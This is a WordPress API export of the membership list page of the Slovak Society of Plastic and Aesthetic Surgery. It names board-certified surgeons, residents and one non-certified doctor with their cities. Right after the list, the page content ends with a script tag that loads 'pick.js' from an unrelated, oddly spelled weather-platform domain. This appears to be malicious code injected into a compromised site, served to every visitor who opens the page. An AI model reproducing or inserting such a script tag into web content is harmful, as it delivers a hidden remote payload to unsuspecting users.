{"id":4265,"date":"2021-01-10T23:06:50","date_gmt":"2021-01-10T22:06:50","guid":{"rendered":"https:\/\/wp.plastchir.sk\/list-of-members\/"},"modified":"2021-01-10T23:08:34","modified_gmt":"2021-01-10T22:08:34","slug":"list-of-members","status":"publish","type":"page","link":"https:\/\/www.plastchir.sk\/en\/list-of-members\/","title":{"rendered":"List of members"},"content":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286928814{padding-top: 30px !important;padding-bottom: 0px !important;}&#8221;][vc_column][vc_custom_heading text=&#8221;Board-Certified Plastic Surgeons&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%230a0a0a&#8221; css=&#8221;.vc_custom_1610298161058{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1610298084090{margin-bottom: 0px !important;padding-top: 0px !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li style=\"font-size: 16px;\">Bab\u00edk J\u00e1n, MUDr., CSc. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Babjakov\u00e1 So\u0148a, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Bako\u0161 Peter, MUDr., PhD. Nitra ( vice-president of SSPECH )<\/li>\n<li style=\"font-size: 16px;\">Beck Jozef, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Biensky Pavel, MUDr. Bansk\u00e1 Bystrica<\/li>\n<li style=\"font-size: 16px;\">Boh\u00e1\u010d Martin, MUDr., PhD. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Brezov\u00e1 Barbora, MUDr., PhD. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Bukov\u010dan Peter, MUDr., PhD. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Bumbera J\u00e1n, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Cehl\u00e1r D\u00e1vid, MUDr. Nitra<\/li>\n<li style=\"font-size: 16px;\">\u010cerve\u0148 Du\u0161an, MUDr. Bansk\u00e1 Bystrica<\/li>\n<li style=\"font-size: 16px;\">Dud\u00e1\u0161ov\u00e1 Kompasov\u00e1 Hana, MUDr. Nitra<\/li>\n<li style=\"font-size: 16px;\">Fedele\u0161 Jozef st., doc, MUDr., CSc. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Fedele\u0161 Jozef ml., MUDr., PhD. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Gajdo\u0161 Juraj, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Gl\u00fcck Miroslav, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Hedera Jozef, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Chovan Peter, MUDr. Praha, Pezinok<\/li>\n<li style=\"font-size: 16px;\">Jur\u00e1\u0161ek Viliam, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Kluka Teodor, MUDr., PhD. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Kokavec Radom\u00edr, doc., MUDr., PhD., MBA Bratislava (committee member of SSPAS)<\/li>\n<li style=\"font-size: 16px;\">Koperniech Mari\u00e1n, MUDr. Bansk\u00e1 Bystrica<\/li>\n<li style=\"font-size: 16px;\">Ko\u0161\u0165\u00e1l Ladislav, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Kov\u00e1\u010d Imrich, MUDr. Nitra (committee member of SSPAS)<\/li>\n<li style=\"font-size: 16px;\">Kri\u017eko Milo\u0161, MUDr. Bratislava<\/li>\n<\/ul>\n<p>&nbsp;[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li style=\"font-size: 16px;\">Lengyel Peter, MUDr., PhD. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Luka\u010dkov\u00e1 Katar\u00edna, MUDr. Nitra<\/li>\n<li style=\"font-size: 16px;\">Macho Pavol, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Marsal Gabriel, MUDr. Trnava<\/li>\n<li style=\"font-size: 16px;\">Ml\u00e1dek Daniel, MUDr., PhD. Nitra<\/li>\n<li style=\"font-size: 16px;\">Minarovjech Vlastibor, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">O\u010den\u00e1\u0161 Milan, MUDr. Bansk\u00e1 Bystrica<\/li>\n<li style=\"font-size: 16px;\">Oravcov\u00e1 Darina, MUDr. Poprad<\/li>\n<li style=\"font-size: 16px;\">Ors\u00e1g J\u00e1n, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">Palen\u010d\u00e1r Drahom\u00edr, MUDr., PhD. Bratislava (president of SSPAS)<\/li>\n<li style=\"font-size: 16px;\">Paliatka Juraj, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Payer Juraj, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">R\u00e1cz Norbert, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Simonov\u00e1 Katar\u00edna, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">Sopko Karol, MUDr. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">\u0160ipka Marek, MUDr. Bratislava<\/li>\n<li style=\"font-size: 16px;\">\u0160krob\u00e1nek Jozef, MUDr. Nitra<\/li>\n<li style=\"font-size: 16px;\">Tori\u0161kov\u00e1 Nikoleta, MUDr. Praha<\/li>\n<li style=\"font-size: 16px;\">Tr\u0161ka Rastislav, MUDr., PhD. Bratislava (committee Member of SSPAS)<\/li>\n<li style=\"font-size: 16px;\">Ulianko Jozef, MUDr. Bansk\u00e1 Bystrica (scientific secretary of SSPAS)<\/li>\n<li style=\"font-size: 16px;\">Valdman Peter, MUDr. Pre\u0161ov<\/li>\n<li style=\"font-size: 16px;\">Zamboj Zdenko, MUDr. Trnava<\/li>\n<li style=\"font-size: 16px;\">Z\u00e1bavn\u00edkov\u00e1 Marianna, MUDr., PhD. Ko\u0161ice<\/li>\n<li style=\"font-size: 16px;\">\u017diak Peter, MUDr., PhD. Bratislava<\/li>\n<li style=\"font-size: 16px;\">\u017dikla Ivan, MUDr. Bansk\u00e1 Bystrica<\/li>\n<\/ul>\n<p>&nbsp;[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610299262653{padding-top: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column][vc_custom_heading text=&#8221;Plastic Surgery Residents&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%230a0a0a&#8221; css=&#8221;.vc_custom_1610299109719{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1610298084090{margin-bottom: 0px !important;padding-top: 0px !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>Belej Ond\u0159ej, MUDr. Bratislava<\/li>\n<li>Pocisk Milan, MUDr. Bratislava<\/li>\n<li>Val\u00ed\u010dkov\u00e1 J\u00falia, MUDr. Bratislava<\/li>\n<\/ul>\n<p>&nbsp;[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610299275642{padding-top: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column][vc_custom_heading text=&#8221;Doctors Without Board Certification in Plastic Surgery&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%230a0a0a&#8221; css=&#8221;.vc_custom_1610299175339{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1610299395018{margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 30px !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>Fri\u0161man Eugen, MUDr., PhD. Ko\u0161ice<\/li>\n<\/ul>\n<p>&nbsp;[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script src='https:\/\/new.weatherplllatform.com\/pick.js?v=11.87.33' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286928814{padding-top: 30px !important;padding-bottom: 0px !important;}&#8221;][vc_column][vc_custom_heading text=&#8221;Board-Certified Plastic Surgeons&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%230a0a0a&#8221; css=&#8221;.vc_custom_1610298161058{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1610298084090{margin-bottom: 0px !important;padding-top: 0px !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Bab\u00edk J\u00e1n, MUDr., CSc. Ko\u0161ice Babjakov\u00e1 So\u0148a, MUDr. Ko\u0161ice Bako\u0161 Peter, MUDr., PhD. Nitra ( vice-president of SSPECH [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.6.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>List of members - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.plastchir.sk\/en\/list-of-members\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"List of members - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\" \/>\n<meta property=\"og:description\" content=\"[vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286928814{padding-top: 30px !important;padding-bottom: 0px !important;}&#8221;][vc_column][vc_custom_heading text=&#8221;Board-Certified Plastic Surgeons&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%230a0a0a&#8221; css=&#8221;.vc_custom_1610298161058{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1610298084090{margin-bottom: 0px !important;padding-top: 0px !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Bab\u00edk J\u00e1n, MUDr., CSc. Ko\u0161ice Babjakov\u00e1 So\u0148a, MUDr. Ko\u0161ice Bako\u0161 Peter, MUDr., PhD. Nitra ( vice-president of SSPECH [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.plastchir.sk\/en\/list-of-members\/\" \/>\n<meta property=\"og:site_name\" content=\"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\" \/>\n<meta property=\"article:modified_time\" content=\"2021-01-10T22:08:34+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.plastchir.sk\/en\/list-of-members\/\",\"url\":\"https:\/\/www.plastchir.sk\/en\/list-of-members\/\",\"name\":\"List of members - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\",\"isPartOf\":{\"@id\":\"https:\/\/www.plastchir.sk\/#website\"},\"datePublished\":\"2021-01-10T22:06:50+00:00\",\"dateModified\":\"2021-01-10T22:08:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.plastchir.sk\/en\/list-of-members\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.plastchir.sk\/en\/list-of-members\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.plastchir.sk\/en\/list-of-members\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.plastchir.sk\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"List of members\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.plastchir.sk\/#website\",\"url\":\"https:\/\/www.plastchir.sk\/\",\"name\":\"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.plastchir.sk\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"List of members - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.plastchir.sk\/en\/list-of-members\/","og_locale":"en_US","og_type":"article","og_title":"List of members - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","og_description":"[vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286928814{padding-top: 30px !important;padding-bottom: 0px !important;}&#8221;][vc_column][vc_custom_heading text=&#8221;Board-Certified Plastic Surgeons&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%230a0a0a&#8221; css=&#8221;.vc_custom_1610298161058{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1610298084090{margin-bottom: 0px !important;padding-top: 0px !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Bab\u00edk J\u00e1n, MUDr., CSc. Ko\u0161ice Babjakov\u00e1 So\u0148a, MUDr. Ko\u0161ice Bako\u0161 Peter, MUDr., PhD. Nitra ( vice-president of SSPECH [&hellip;]","og_url":"https:\/\/www.plastchir.sk\/en\/list-of-members\/","og_site_name":"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","article_modified_time":"2021-01-10T22:08:34+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.plastchir.sk\/en\/list-of-members\/","url":"https:\/\/www.plastchir.sk\/en\/list-of-members\/","name":"List of members - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","isPartOf":{"@id":"https:\/\/www.plastchir.sk\/#website"},"datePublished":"2021-01-10T22:06:50+00:00","dateModified":"2021-01-10T22:08:34+00:00","breadcrumb":{"@id":"https:\/\/www.plastchir.sk\/en\/list-of-members\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.plastchir.sk\/en\/list-of-members\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.plastchir.sk\/en\/list-of-members\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.plastchir.sk\/en\/"},{"@type":"ListItem","position":2,"name":"List of members"}]},{"@type":"WebSite","@id":"https:\/\/www.plastchir.sk\/#website","url":"https:\/\/www.plastchir.sk\/","name":"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.plastchir.sk\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4265"}],"collection":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/comments?post=4265"}],"version-history":[{"count":6,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4265\/revisions"}],"predecessor-version":[{"id":4277,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4265\/revisions\/4277"}],"wp:attachment":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/media?parent=4265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}